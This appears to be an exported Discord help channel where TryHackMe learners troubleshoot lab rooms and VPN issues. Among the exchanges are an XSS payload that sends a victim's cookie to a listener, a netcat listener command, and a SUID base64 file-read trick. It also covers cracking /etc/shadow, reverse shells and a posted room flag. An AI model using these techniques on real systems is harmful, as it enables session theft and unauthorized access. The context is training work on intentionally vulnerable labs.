Hello everyone, I'm in room Windows Internals, task 5. Has anyone done it? Please

rock.txt.gz is a gzip file

gotta unzip it

yeah I have never worked with a gz file before and ho idea I had to use gzip. Much appreciated.

gzip -d <file>

Yeah got it working and finished the room

Anyone? I did what the instructions said but the answer I get is not correct

urgent need of help on task 7 please, just need the layout of the answer explained please?
https://tryhackme.com/room/opsec (edited)

@Kiru#5962

Hi

im attempting the Networking room and am stuck on a question

"What kind of Protocol is TCP?"

I have done all of the other questions and find myself stuck on this one, i've re read the whole section again and again and tried researching it

Transport layer?

no

What is the room url?

https://tryhackme.com/room/introtonetworking

Which task?

TCP Model

4

Yeah.

The answer is in the text.

Have a read again.

ive read the text over and over

IF you're stuck

Use this.

@! Kiru

@wise kiln

hi

Any help with Cross-site Scripting Room https://tryhackme.com/romm/xssgi will be appreciated. What is meant by "staff-session cookie". I can get a cookie but it's not the right one as it's for the ticket I just created. TIA

You have to wait for the automation behind to open the ticket as a staff member, otherwise you only get your own session cookie

Hi, not sure how to report this but i think the Wireshark101 room is wrong?

If you don't receive it after 1 - 2 mins and you sure your payload is working (like you verified by receiving your own session cookie), restart the target machine

@left thunder Thank you! I think that room could have been clearer. What you are saying makes perfect sense. Thanks again!

Gave +1 Rep to @left thunder

If something is wrong with a room, it's in #room-bugs to report

thanks

Gave +1 Rep to @left thunder

@left thunder By "restart the target machine", do you mean "Terminate" the current target machine and "Start" a new target machine?

Yes

@left thunder Thanks... OK, I am going to do this 3 more times then I am giving up on this room and moving on. Once I got my ticket cookie because I didn't know any better. Now for the past 2 times I have not gotten any cookie including my ticket cookie. I copied and pasted the payload from the room replacing {URL_OR_IP} with my local machine's IP (I am using the VPN) and in a terminal window i have nc -nlvp 9001 listening on any 9001. Wish me lucj!

Gave +1 Rep to @left thunder

@left thunder i meant my local machine's IP:9001

I mean, if you are using the same payload and you are not even receiving your own session cookie, there might be something wrong with the payload

Could you copy paste it so that I can see?

@left thunder Hold on as it will take me a few minutes to transfer from my Kali to Windows here.

@left thunder </textarea><script>fetch('http://192.168.1.76:9001?cookie=' + btoa(document.cookie) );</script>

Is that the IP you are using ?

yes that's the IP of my Kali Machine where all of this is running

Well you have to use your tun0 IP, the target machine can't reach you with that IP

Is the VPN running directly inside your kali VM or on your windows host?

VPN on Kali VM

Okay, then check ip a s and use your tun0 IP

Also make sure there is only a tun0 interface and not any extra like tun1, tun2 etc.

yup.. if config shows just tun0 not tun1, etc

ok!!!! let me try THAT!

curious what does ip a s show?

Enter it and you'll see. ifconfig is deprecated

ahhhh thanks!

its colorful too! 🙂

ok... waiting a minute or two... the suspense builds

You might have to restart the target machine again, since you used some bad payloads with a wrong IP, but maybe it still works, this machine is a bit finicky

ok but it makes sense to use the tun0 address

Certainly, yes 😄

duhh 🙂

got a message in the VPN window... HMAC authentication failed

i think I am just going to move on... I've wasted too much time in this room... and I have learned a little bit about networking

thanks for your help though!!

Up to you, not a problem

@left thunder BTW. I finally completed the room using Attack Box and your suggestions. VPN kept giving me HMAC Authorization Errors. I left some constructive suggestions on how to improve the room.

People ignored my question :(

Windows Internals
Task 5
Question 4

ever figure this out?

Hey, I know that the problem from Lemur already been solved. But I just realize that if I only put one line at the end of the header request the flag won't appear.. instead we should add 2 lines.. maybe you can add it to the room hint.. thanks

Gave +1 Rep to @left thunder

I'm not the room creator nor be able to edit anything, but I would say that is nothing to add as a room hint. For once because the room is showing you to add the extra header in the header tab instead of the request tab iteself. And secondly, if there are 2 empty lines in the original request but you are altering the request so that there is only 1 empty line left, that's not an issue of the room. 🙂

Hi

Hi

I can't seem to find the password, to deploy the machine for the vulnversity room.

Can someone please help out?

There is no password to deploy the machine, you just have to press the green "start machine" button in task 1

Thanks. I assumed we had to ssh tryhackme@ and then start off

anybody had the problem where you start a machine and it runs, but mozilla is not connecting to any website?

Are you using the attackbox?

We might need some more information to help.

1. Which room?
2. Are you using the attackbox
3. Are you a subscriber?

Nop, I had to go to another room

Hi there,

How do I login to attacktive backup username

I have tried the following combo in RDP and it is not working for me:

ATTACKTIVEDRECackup

SPOOKYSECackup

.backup

backup2517860

hey, I transferred the executable which is present in this room https://tryhackme.com/room/brainstorm to the machine which is available in this room https://tryhackme.com/room/bufferoverflowprep and still, I am getting this error (also it is not running properly in the immunity debugger)

I'm not sure why you want to do that, but it seems the executable in Brainstorm room depends on the essfunc.dll file as well so you should transfer both .exe and .dll I guess.

Make sure you download it in binary mode from FTP

Tryhackme/room/contentdiscovery , task 3 (manual discovery -favicon) I am trying to download favicon using (curl (site url) | md5sum. But nothing is downloading it keep running stats with time

Is that what you see?

Yes But hash is different

What is the syntax you enter?

curl https://static-labs.tryhackme.cloud/sites/favicon.ico | md5sum

Your URL is wrong.

You need to add a " images/ " between /sites/favicon.

So it becomes.

https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico

Ohhh ok. I was using wrong url

Got it 😊😊. Thank you ❤️

No worries! Happy Hacking!

✌️❤️

Last thing please

Yeah?

My machine has a 10.10.9.141 IP machine that is active. But when I click on the link to access website (Acme IT Support website) It failed to load.

I tried with https and http both. But the site is inaccessible.

Are you still on Content Discovery?

Manual Discovery - Framework Stack

Task 6

You're a free user on the Attackbox?

Yes

You won't be able to do it as you won't have an internet connection.

If possible, I suggest you use a VM.

I also have kali linux in vmware workstation

Use that. 🙂

you just need to download the VPN script.

But how it can resolve it

you can't on the attackbox unless you're a sub.

Ohh okay okay. OpenVPN script

What to do after downloading script

You need to run it with
sudo path/to/file

https://tryhackme.com/room/openvpn here is a guide for how to use the vpn file and how to download it

sudo openvpn /path/to/file.ovpn

So, repeating what I just said, lol.

no you missed the openvpn part of the command

No, because it's part of the file...

It's not like it's missed out.

$ sudo ./shadowabsorber.ovpn                                                              
[sudo] password for sam_tunder: 
sudo: ./shadowabsorber.ovpn: command not found

Tue Apr  5 16:54:49 2022 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 22 2022
Tue Apr  5 16:54:49 2022 library versions: OpenSSL 1.1.1f  31 Mar 2020, LZO 2.10
Tue Apr  5 16:54:49 2022 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
Tue Apr  5 16:54:49 2022 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication

very different

Command worked using (sudo openvpn /filename)

Looks to me like it's part of the file...

yeah the .ovpn file extension yes... but not the openvpn part of the command

Either way, they still got it.

true

Still rude.

It's just loading. Is it okay?

hopefully the room shadow linked will help a lot too

sorry then @lucid junco

when you see that it worked, you now need to leave it like that, just minimize the window.

I wasn't being serious Shadow.

and to close the connection when you are done use ctrl + C

But you will need to open it every time you want to connect to the THM machines.

But it's not done yet.

And Says TLS handshake failed

Process restarting

I have a firewall configured in my network.

Process restarting due to firewall?

It stuck at UDP link remote: [AF_INET]3.7.33.194:1194

yeah the firewall could be a problem

🙁

Can't i use a VPN to bypass the firewall and then try again?

No, is it your computer?

Yeah

But not the whole network.

It's BYOD. And I am using my office network.

You could speak to you ICT team, ask them if they can open up port 443 ( I think it's that one) so you can use OpenVPN.

If they say no, there is nothing we can do.

I am sure they are not gonna allow me here . So simply i can use my phone carrier internet using hotspot. It may work.

That could work, yes

Everything is working well now. Thank you for your support and helping me to figure it out. ❤️😊

no problem... enjoy your learning potential

Once again thanks to both of you guys ☺️ Scrubz and Shadow.

So I am losing my mind with Burp Suite

Whenever I use 'http://machine_ip/" I get this:

I can't upload the image but it says "ERROR: unknown host'

No matter whether I use the AttackBox, Kali or WIndows.

Are you still having this problem?

Yep

Have you started the machine in task 1?

I did. Hold up. Let me go back to my computer.

The machines are booting

Room finished!

Praise the sun!

In the gatekeeper room, the gatekeeper.exe doesn't appear to be vulnerable to buffer overflow. Is it exploitable but I'm just messing it up?

Hi

I need some help with the startup room

Basically some spoilers ||theres a web on http that says its being built with ftp and ssh open, and i've found an address with /files/ and it has a meme .png file in it in which i looked at with steganography but nothing found, and a notice with a user called maya in which i am trying to find if this user is registered in the ftp or ssh server||

|| But, while trying to log in of course ftp nor ssh tells me if the user is registered so i cant really try to brute force it and now i'm stuck at this stage||

||Theres a hint that says "FTP and HTTP. What could possibly go wrong?"||

What is the room URL?

https://tryhackme.com/room/startup

||Well, Apparently, You can log into FTP as anonymous so that was my goof, looking through some more stuff now||

||Never mind, The /files/ address on the website replicates the ftp server and theres an ftp directory which wont let me in both website and terminal||

Wheres the location for php reverse shells in kali linux? Or will I have to find some on github

Nvm got one from pentestmonkey

ah thank you

||I've done it! With a php reverse shell and now its time to priv esc||

I'm having a hard time understanding what's going on, here. I guess there's a firewall...

it says the scripts were ran but no info returned
this is in the Kenobi room

Late reply - but as I am revisiting Snort. Take a look at Snort.org and their description of what it is.
"..or it can be used as a full-blown network intrusion prevention system."

which room is this for? if the VM is windows, you may not be giving it enough time to come up

the scan runs, returns nothing. This is the Kenobi room under the Offensive Pentesting module

i'm not sure why the scripts aren't working correctly

idk why I have so much trouble with nmap, lol

are you on attackbox, or your kali vm?

on my own vm

but tried it from my host as well

are you on the VPN?

yes. I'm connected

Bro may I know any good alt for nessus

i'm confused to what the problem is. I've never had a script not return anything

hi everyone
im trying to use bloodhound to help enumerate the network
when importing the loot.zip file - keep getting a BAD JSON FILE error
would love some help on how to fix this

#infosec-general unless this question is specific to a THM room

You can ping 10.10.10.10? and curl 10.10.10.10/whoami shows your tun0 ip address?

OK

can you show me a screenshot of ip a @white salmon ?

idk why it has multiple tunnels. Probably because I had to reconnect a few times

and curl 10.10.10.10/whoami

that actually is likely the problem

you have multiple VPN connections open

ps aux | grep openvpn

no response for curl/whoami

and the ps command please

hangup

i might just have to restart my computer

Yeah, you have all the VPNs open.

You need to kill them all

killall openvpn

that worked perfectly! thank you

Gave +1 Rep to @umbral umbra

Im trying to get the SEQ number of packet 62 (Snort challenges 1 room, Task 2 Question 4) and i think im using the -n tag correctly as I ansered the previous questions using it. But it is just not taking my answer now

'-n 62' seems like it should work.. i mean the sequence nunbers seem to all be the same anyway. I dont understand how i can be getting it so wrong.

Ah maybe i was checking the alert files as opposed to the log file..

Nope. Still no luck. Sorry for spam everyone..

I figured it out lol

Metasploit exploitation Meterpreter -- I cannot get meterpreter prompt from the attackbox, any ideas?

Probably best to verify in order to be able to send screenshots

Then send a screenshot of your module options

!docs verify

Hey, any hints (privesc) in this room https://tryhackme.com/room/gatekeeper

look into decrypting firefox browser creds :)

Hi all, im working my way though the https://tryhackme.com/room/ccpentesting room and I'm a bit stuck on the SQL injection section, I've found the db name, and I can print the tables, but instead of having fields and values, they are just blank. Here is my input to the console sqlmap -u http://10.10.220.250 --forms -D tests --dump

It works 😉 but is there any command like sudo in windows

Working on the https://tryhackme.com/room/linprivesc room and I'm stuck on the SUID privilege escalation section. I believe I found the vulnerable ****64 binary with the "s" bit set, but I'm unsure as to how I can abuse it to maintain root privileges.

The runas command is also not working

No worries I got it :)

I am particularly confused on what should be stored in the LFILE variable shown in the GTFObin example

look into psexec

thank you for the suggestions I complete the room :))

Gave +1 Rep to @cedar anvil

Nevermind, I figured out what I had to do

that binary lets you ||read arbitery files|| which gives you access to root account

👍 on my way to figuring out that password with|| john||!

Still working on the https://tryhackme.com/room/linprivesc room and stuck on the SUID section. I abused the vulnerable binary to read the /etc/shadow and /etc/passwd files, unshadow them, and cracked the passwords for user2 and gerryconway users. While I was able to answer the 2nd question in this section, I'm still confused on how I'll be able to get read-access for flag3.txt.

Was there another vulnerable binary that I missed? I tried using the same ****64 binary to read the file, but I was still denied access. I could use a nudge in the right direction.

what was the command you tried to use to read flag3.txt???

LFILE=/home/ubuntu/flag3.txt
./base64 "$LFILE" | base64 --decode

Result: ./base64: /home/ubuntu/flag3.txt: Permission denied

Perhaps the full path is causing an issue?

what user are you running the command as???

user2

hmmmm

going to launch the machine and test it themselves to see

in the mean time a good idea might be for you to verify your discord so you can share screenshots

!docs verify

try ||base64 /home/ubuntu/flag3.txt | base64 --decode|| if that does not work try restarting the target machine and try again... or run the command as the user it starts you out as

shadow thinks you made it not work because of the ./ before the command

Perfect! I had no idea that was the issue. Thanks for helping me troubleshoot 👍

Gave +1 Rep to @alpine kestrel

no problem

Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.

Please help!!

Working on https://tryhackme.com/room/linprivesc and I'm stuck on the Cron Jobs section. I've modified the existing backup.sh file and created the previously deleted /tmp/test.py file and haven't received a shell yet.

Is it something with my syntax? Or do I need to use Python through Bash in backup.sh?

Check the permissions of your backup.sh file

That's embarassing. Got the reverse shell just now after changing it. Thank you for the nudge!

Gave +1 Rep to @left thunder

Happens 😄

have made that mistake to many times

This is just a general question. Is it possible to add a user to the /etc/passwd file with echo?

Every time I attempt this, it spits out this weird KYkKmueqNX/ string as if my command was edited as it was executed. Then I look in the /etc/passwd file and the password I tried to enter is replaced by a single /.

I understand that this isn't required for the particular section I'm in, but I remember it being discussed in a previous one and I wanted to try it out.

I'm trying to do this in https://tryhackme.com/room/linprivesc on the Cron Jobs machine.

I also escalated to root before trying this so it shouldn't be an issue of privilege

Starting doing some research on the difference between /passwd and /shadow

I understand that shadow is for the encrypted passwords, and passwd is for user account information. I saw in the SUID section that they were able to only edit the /passwd file and successfully add a user. Or was there a step that wasn't shown which involved editing the /shadow file?

Or maybe echo caused some sort of issue? Idk, I'll have to do more research into /passwd and /shadow like you said

@grave dagger i was curious about that too, didn't try that method, but remember that snippet in the instructions ... from your other screenshot, looks like no escape or quoted characters in that string, with the special chars in the hash, bash (or sh ) will interpret a lot as something it's trying to process... you could write just that line to a file by itself, then cat my-new-user >> /etc/passwd ... otherwise you'll need quotes, backslashes, etc to escape all the special chars in the hash I think

Someone on ollie?

There would be a dedicated channel for it in case you didn't saw it #962049333614768178

Ye, I think just escaping the $ chars should be fine @grave dagger

Ohhh I didn’t think to write it to a file first and then piping it. That’s smart! So basically if I want to write it directly to the file I need to use escape characters

I always forget about special characters

Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.
Please help!!

You don't need to multi post in different channels to get an anaswer.

However I've just done it, there is a very strong change you're entering the wrong thing.

that is the flag I am entering: THM{1Nj3c7_4IL_7H3_7h1NG2}

I've helped you in #room-help (This is an example of keeping to one channel) Sorry for minimodding

-I am trying to do the Burp Suite room and I am in the Sequencer portion of the room. When I send a GET request that generates a cookie from my web browser to the sequencer; it doesn't create any tokens.
-I put this same request in the repeater to see what would happen and the response doesn't set a cookie, it gives me a "400 Bad Request" status.

Why is the response status changing from a "200 OK" in the HTTP History tab to a "400" in the repeater/sequencer?

hello - can anyone help me with room Splunk2g where it's asking for Amber Turing's personal e-mail address?

like is it somewhere in the 4 events you get from this search query:index="botsv2" sourcetype="stream:smtp" aturing@froth.ly berkbeer

oh snap...never mind, I actually found it 😞

ok now I'm stuck on this question:
What SQL function is being abused on the URI path from the previous question?

can i get some help on wonderland

how do i exploit walrus_and_the_carpenter.py

I tried libaray hijacking but randon .py is not writable

and cant change the priority

Is this an issue of climate change, @burnt rivet ?

I tried harder 👍

somebody please help me 😦

im absolutely going insane here

what you stuck on?

trying to get a metasploit shell on a pivoted windows pc (PCFILESRV01)

Hey, im doing the Cyborg CTF, and im stuck on not knowing what to do. I have just a bunch of encrypted things however no clue what to do with them as 1 is sha256. others seem to be MySQL323 or LM. But no Database. Im basiclly lost. I've found multiple things such as the directory to /squid/passwd and /squid/squid.conf. Not only that I have the final archive with a bunch of files that just completely confuse me such as the config text file. ID? and Key?(The ID is a hashed SHA256 but what is the key?) Am I going in the right direction? I have no idea what to do next

https://gyazo.com/75fb4b560bb44b61efbc509af0373bf5

https://gyazo.com/3136ffcfe15dd9dd38c28797d6bb2a8d

I just don't understand these files

hey all. wondering if anyone can point me in the right direction...

currently in Attacktive Directory.
in task 5, abusing Kerberos,

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
I haven't got a clue which one I am supposed to do?

how do i select a process

Locate the process that is running on the deployed instance (10.10.214.66). What flag is given?

i found the tryhack+ process running

but how do i see the flag?

on linux: ps aux
on windows: powershell -c Get-Process

well see the first about 10-15 chars and use find on this page with ctrl + f on the hashcat examples page

i.e ||https://hashcat.net/wiki/doku.php?id=example_hashes|| is the link if you need it @exotic geyser